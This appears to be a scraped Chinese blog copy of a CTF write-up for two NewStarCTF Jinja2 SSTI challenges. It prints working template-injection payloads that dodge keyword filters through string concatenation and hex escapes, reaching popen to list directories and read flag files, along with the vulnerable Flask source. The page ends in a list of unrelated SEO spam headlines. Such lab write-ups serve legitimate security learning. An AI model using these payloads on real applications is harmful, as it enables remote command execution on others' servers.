当前位置: 首页 > wzjs >正文

做旅行社的都是在哪网站拿票深圳全网推广

wzjs 2025/8/20 11:07:00
做旅行社的都是在哪网站拿票,深圳全网推广,wordpress 定制缩略图,做网站首页有什么[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码,这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

[NewStarCTF 公开赛赛道]BabySSTI_One

测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用

可以考虑拼接或者编码,这里使用拼接


?name={{()["__cla"~"ss__"]}}



?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()}}

 直接命令执行


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ls")["read"]()}}


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ca"~"t"~" "~"app*")["read"]()}}

from flask import Flask, request 
from jinja2 import Template 
import re 
app = Flask(__name__) 
@app.route("/") 
def index(): name = request.args.get('name', 'CTFer') if not re.findall('class|base|init|mro|flag|cat|more|env', name): t = Template("Welcome to NewStarCTF, Dear " + name + "Try to GET me a NAME") return t.render() else: t = Template("Get Out!Hacker!") return t.render() 
if __name__ == "__main__": app.run()

根目录下


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("tac /fla*")["read"]()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

burp测一下过滤哪些

过滤了这些内容,可用如下

尝试十六进制编码绕过


?name={{()['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']}}

 

 


#{{()['__class__']['__base__']['__subclasses__']()}}
{{()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()}}


name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}#    {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls')['read']()}}

 

 flag在根目录下


?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x6c\x73\x20\x2f')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls /')['read']()}}?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x5f\x69\x6e\x5f\x68\x33\x72\x33\x5f\x35\x32\x64\x61\x61\x64')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('cat /flag_in_h3r3_52daad')['read']()}}

http://www.dtcms.com/wzjs/416851.html

相关文章:

  • wordpress页面构建器中文广州seo好找工作吗
  • 实训做网站收获互联网营销案例分析
  • 郑州做网站公司有多少钱培训seo哪家学校好
  • 莱芜都市网下载网站关键词排名手机优化软件
  • 做网站弄关键词多少钱网络营销的概念和特点是什么
  • 安徽政府网站建设郑承乾高端网站建设的公司
  • 老百姓可以做监督政府的网站吗正规百度推广
  • 自己做竞猜网站挣钱吗灰色关键词排名方法
  • 网络科技网站有哪些方面企业网站快速排名
  • 大连营商环境建设局网站网络营销是学什么的
  • 做网站上线一般要多久seo在线外链
  • 工会网站开发需求分析线上销售方案
  • 什么叫网站域名深圳网络营销推广招聘网
  • 中国专门做统计网站长春网站制作系统
  • 做网站大作业的心得体会全球网站流量排名100
  • 吕梁网站制作吕梁安全网站优化搜索排名
  • 做网站退款怎么做会计分录搜索引擎广告的优缺点
  • 新类型的网站智能营销方法
  • 河南商丘今日疫情平台关键词排名优化
  • wordpress加百度广告代码出问题关键字优化
  • 攀枝花建设工程有限责任公司网站怎么卸载windows优化大师
  • 海南房产网站建设网站展示型推广
  • 橙子建站官网联系电话关键词优化是什么
  • 政府网站建设相关文件360搜索引擎地址
  • 加大整合力度网站集约建设搜索引擎外部链接优化
  • 电商网站开题报告百度官方网站下载安装
  • 牛 网站建设网店如何推广
  • 互动易平台专业seo优化推广
  • 医疗网站建设设计个人网站
  • 网站建设中 下载聊城网站推广公司